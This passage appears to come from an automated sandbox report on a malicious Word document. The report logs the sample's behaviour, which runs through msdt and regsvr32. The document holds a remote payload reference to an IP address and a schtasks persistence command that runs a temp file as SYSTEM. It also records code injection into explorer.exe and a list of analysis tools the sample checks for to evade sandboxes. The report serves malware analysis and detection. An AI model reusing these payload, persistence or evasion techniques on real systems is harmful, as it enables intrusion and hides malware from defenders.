                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049FAE7E push cs; iretd 26_2_049FAE52
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049FCB5D push esi; iretd 26_2_049FCB62
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0537AD7C push cs; iretd 27_2_0537AE52
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_053601B0 pushad ; iretd 27_2_053601B1
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0537B02E push ebx; ret 27_2_0537B02F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0537CB5D push esi; iretd 27_2_0537CB62
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0537AE7E push cs; iretd 27_2_0537AE52
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05B901B0 pushad ; iretd 28_2_05B901B1
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05BAAD7C push cs; iretd 28_2_05BAAE52
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05BAB02E push ebx; ret 28_2_05BAB02F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05BACB5D push esi; iretd 28_2_05BACB62
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05BAAE7E push cs; iretd 28_2_05BAAE52
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007BB02E push ebx; ret 33_2_007BB02F
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007BAD7C push cs; iretd 33_2_007BAE52
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007A01B0 pushad ; iretd 33_2_007A01B1
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007BAE7E push cs; iretd 33_2_007BAE52
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007BCB5D push esi; iretd 33_2_007BCB62
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EEEBB LoadLibraryA,GetProcAddress,26_2_049EEEBB
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.cmdline
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.cmdline
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.cmdline

                            Persistence and Installation Behavior

                            barindex
                            Contains an external reference to another file
                            Source: document.xml.relsExtracted files from sample: mhtml:http://185.234.247.119:80/123.res!http://185.234.247.119:80/123.res
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\DiagPackage.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\en-US\DiagPackage.dll.muiJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\DiagPackage.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\en-US\DiagPackage.dll.muiJump to dropped file

                            Boot Survival

                            barindex
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5316 base: 115F380 value: E9 40 6E 64 FF Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6384 base: 115F380 value: E9 40 6E E4 FF Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5836 base: 115F380 value: E9 40 6E AD FF Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ExplorerJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: explorer.exe, 00000021.00000003.500303065.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                            Source: explorer.exe, 00000021.00000003.500251790.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
                            Source: explorer.exe, 00000021.00000003.500251790.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
                            Source: explorer.exe, 00000021.00000003.500303065.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMPORTREC.EXE
                            Source: explorer.exe, 00000021.00000003.500303065.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
                            Source: explorer.exe, 00000021.00000003.500251790.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
                            Source: explorer.exe, 00000021.00000003.500251790.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                            Source: explorer.exe, 00000021.00000003.500251790.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                            Source: explorer.exe, 00000021.00000003.500251790.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                            Source: explorer.exe, 00000021.00000003.500303065.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                            Source: C:\Windows\SysWOW64\explorer.exe TID: 6020Thread sleep count: 58 > 30
                            Source: C:\Windows\SysWOW64\explorer.exe TID: 7144Thread sleep count: 73 > 30
                            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_26-13464
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1185Jump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 425Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_26-11570
                            Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EDD62 GetSystemInfo,26_2_049EDD62
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EBCFC FindFirstFileW,FindNextFileW,26_2_049EBCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0536BCFC FindFirstFileW,FindNextFileW,27_2_0536BCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05B9BCFC FindFirstFileW,FindNextFileW,28_2_05B9BCFC
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007ABCFC FindFirstFileW,FindNextFileW,33_2_007ABCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EEEBB LoadLibraryA,GetProcAddress,26_2_049EEEBB
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory protected: page write copy | page execute and write copy | page guardJump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007A5FF2 RtlAddVectoredExceptionHandler,33_2_007A5FF2

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Maps a DLL or memory area into another process
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
                            Writes to foreign memory regions
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 7D0000Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 115F380Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: FD0000Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 115F380Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: C60000Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 115F380Jump to behavior
                            Allocates memory in foreign processes
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 7D0000 protect: page read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: FD0000 protect: page read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: C60000 protect: page read and writeJump to behavior
                            Injects code into the Windows Explorer (explorer.exe)
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5316 base: 7D0000 value: 9CJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5316 base: 115F380 value: E9Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6384 base: FD0000 value: 9CJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6384 base: 115F380 value: E9Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5836 base: C60000 value: 9CJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5836 base: 115F380 value: E9Jump to behavior
